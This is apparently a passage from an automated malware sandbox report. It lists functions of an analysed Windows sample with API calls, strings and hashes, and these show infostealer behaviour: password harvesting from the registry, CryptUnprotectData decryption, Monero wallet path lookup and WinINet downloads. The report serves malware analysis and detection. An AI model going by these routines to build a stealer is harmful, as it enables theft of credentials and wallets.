                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E36BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E36BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E36BF0
                              • CloseHandle.KERNEL32(00000000), ref: 00E36C10
                              • InternetCloseHandle.WININET(00000000), ref: 00E36C17
                              • InternetCloseHandle.WININET(?), ref: 00E36C21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: fe7d19b9981eedbadf1a18d4ef7beff9c832dad823d8d3661861028a5ab076b0
                              • Instruction ID: b47cdbce8fa2bfacab6ef15fa71f64833521a5b168afa247e41df37b0512cdf8
                              • Opcode Fuzzy Hash: fe7d19b9981eedbadf1a18d4ef7beff9c832dad823d8d3661861028a5ab076b0
                              • Instruction Fuzzy Hash: 25418EB1600205BBDB20DF64DC49FAE7BB8AB04704F008455FA45EB290DB74AD00CBA4
                              Function 00E3BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3BC1F
                              • lstrlen.KERNEL32(00000000), ref: 00E3BC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3BC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3BC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3BCAC
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E3BD23
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 1f61d5f10c551fe3ef82a2e90f7699be937148c4cf8c84c157243d17daba65bf
                              • Instruction ID: 4517c37ac1b22d1142cf15bd9f95e07847bd4c6fd572442693547acc9d5f1b3b
                              • Opcode Fuzzy Hash: 1f61d5f10c551fe3ef82a2e90f7699be937148c4cf8c84c157243d17daba65bf
                              • Instruction Fuzzy Hash: 07A12C30A01205CFCB35DF68D94DA6ABBF4AF44309F29A46DE646EB261DB36DC41CB50
                              Function 00E55EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00E56014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 00E5609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E560D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: 6d1a14f34b526242a2dad240a8740e20d148638691fa636cab5ec5b2532a5165
                              • Instruction ID: 3611bab2b5644370e7eac36f396374b306d519c56dc5888d7fe097180a21b80b
                              • Opcode Fuzzy Hash: 6d1a14f34b526242a2dad240a8740e20d148638691fa636cab5ec5b2532a5165
                              • Instruction Fuzzy Hash: 6A619171710604DBDB28CF5CC89096EB3B6EF84306B645E19E892A73C1D731ED888BA5
                              Function 00E4E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E06F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E07D
                              • lstrcat.KERNEL32(?,?), ref: 00E4E098
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0AC
                              • lstrcat.KERNEL32(?,00D1A5F0), ref: 00E4E0C0
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0D4
                              • lstrcat.KERNEL32(?,00D2E458), ref: 00E4E0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 79f37c1dec3b90a7fec19fd5f00e2a8cef3f68747b028cc65122c699b2f9c011
                              • Instruction ID: 9b6c2c0d6d509c3630eb0ce6a1f477607963cef63ab00c13571191b39ece0172
                              • Opcode Fuzzy Hash: 79f37c1dec3b90a7fec19fd5f00e2a8cef3f68747b028cc65122c699b2f9c011
                              • Instruction Fuzzy Hash: 1141AD7191021C9FCB25EB64E848ADD77B4BF48304F1069A8FA8AA3355DB349F85CF90
                              Function 00E37A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E377D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E37805
                                • Part of subcall function 00E377D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E3784A
                                • Part of subcall function 00E377D0: StrStrA.SHLWAPI(?,Password), ref: 00E378B8
                                • Part of subcall function 00E377D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E378EC
                                • Part of subcall function 00E377D0: HeapFree.KERNEL32(00000000), ref: 00E378F3
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E37A90
                              • lstrcat.KERNEL32(00000000,?), ref: 00E37ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00E37ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E37AF0
                              • wsprintfA.USER32 ref: 00E37B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E37B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E37B47
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E37B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: af78c409efe890f24abc51a28eb3ecb88eaef779786a6e757135c39f52713d18
                              • Instruction ID: 59a5f777afebf4bbb3f380507d7fb233c3f25e6bdb5733bb7e25d02ed05acbce
                              • Opcode Fuzzy Hash: af78c409efe890f24abc51a28eb3ecb88eaef779786a6e757135c39f52713d18
                              • Instruction Fuzzy Hash: B431B5B2A44214EFCB30DBA4DC489ABBBBAEB84304F146519F585B3644DB75E940C760
                              Function 00E481B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E4820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48243
                              • lstrlen.KERNEL32(00000000), ref: 00E48260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48297
                              • lstrlen.KERNEL32(00000000), ref: 00E482B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E482EB
                              • lstrlen.KERNEL32(00000000), ref: 00E48308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48337
                              • lstrlen.KERNEL32(00000000), ref: 00E48351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48380
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5a98e01323b499f811ab39ec51f4c4e04fc8b2895c7147eeedfec12a4cabce96
                              • Instruction ID: c1af0fe239d10ef9b4a278d5f7af904a9b972ae1201603581757fbdea4599988
                              • Opcode Fuzzy Hash: 5a98e01323b499f811ab39ec51f4c4e04fc8b2895c7147eeedfec12a4cabce96
                              • Instruction Fuzzy Hash: AA515F71901612DFDB24EF28E958A6EBBE8EF44740F115518EE46EB244DB34ED50CBE0
                              Function 00E377D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E37805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E3784A
                              • StrStrA.SHLWAPI(?,Password), ref: 00E378B8
                                • Part of subcall function 00E37750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E3775E
                                • Part of subcall function 00E37750: RtlAllocateHeap.NTDLL(00000000), ref: 00E37765
                                • Part of subcall function 00E37750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E3778D
                                • Part of subcall function 00E37750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E377AD
                                • Part of subcall function 00E37750: LocalFree.KERNEL32(?), ref: 00E377B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E378EC
                              • HeapFree.KERNEL32(00000000), ref: 00E378F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00E37A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: 313a74201bea849dacd546a3fac7c3ca0babe6f24faa90d12043ee88dde5d280
                              • Instruction ID: 2ec649ef8e01f2c6659dacb5c2641bbd3893e1cdcd815e616e3b62ca46f603f9
                              • Opcode Fuzzy Hash: 313a74201bea849dacd546a3fac7c3ca0babe6f24faa90d12043ee88dde5d280
                              • Instruction Fuzzy Hash: 3A7140B1D0021DAFDB10DF94DC84AEEBBB9EF49300F1055AAE649F7240EB355A85CB91
                              Function 00E31120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E31135
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E3113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E31159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E31173
                              • RegCloseKey.ADVAPI32(?), ref: 00E3117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 00E3114F
                              • wallet_path, xrefs: 00E3116D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: 0870b2f3b5276f300450d1d2721ca7510930230b0e7e9cf4f4f1702ec446c4d3
                              • Instruction ID: 31938a652d0fe52f5e8f324fba80df26bb9207e27f6bac773c2b49ecc8d41e09
                              • Opcode Fuzzy Hash: 0870b2f3b5276f300450d1d2721ca7510930230b0e7e9cf4f4f1702ec446c4d3
                              • Instruction Fuzzy Hash: 7EF0B475680308BFE7209BE0AD4DFEB7B7CEB04759F000095FF05E2284E6B55A4487A0
                              Function 00E39DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00E39E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00E39E42
                              • LocalAlloc.KERNEL32(00000040), ref: 00E39EA7
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • lstrcpy.KERNEL32(00000000,00E64C48), ref: 00E39FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: fe2e3de93fbe3ed9b14621948c50226d04c165887a9cf8820753c8706a17bb22
                              • Instruction ID: 2d6e46fd8ef9af63489a2417c4d1b41be355afed6ee7693b0abf5bbb2fc5fa79
                              • Opcode Fuzzy Hash: fe2e3de93fbe3ed9b14621948c50226d04c165887a9cf8820753c8706a17bb22
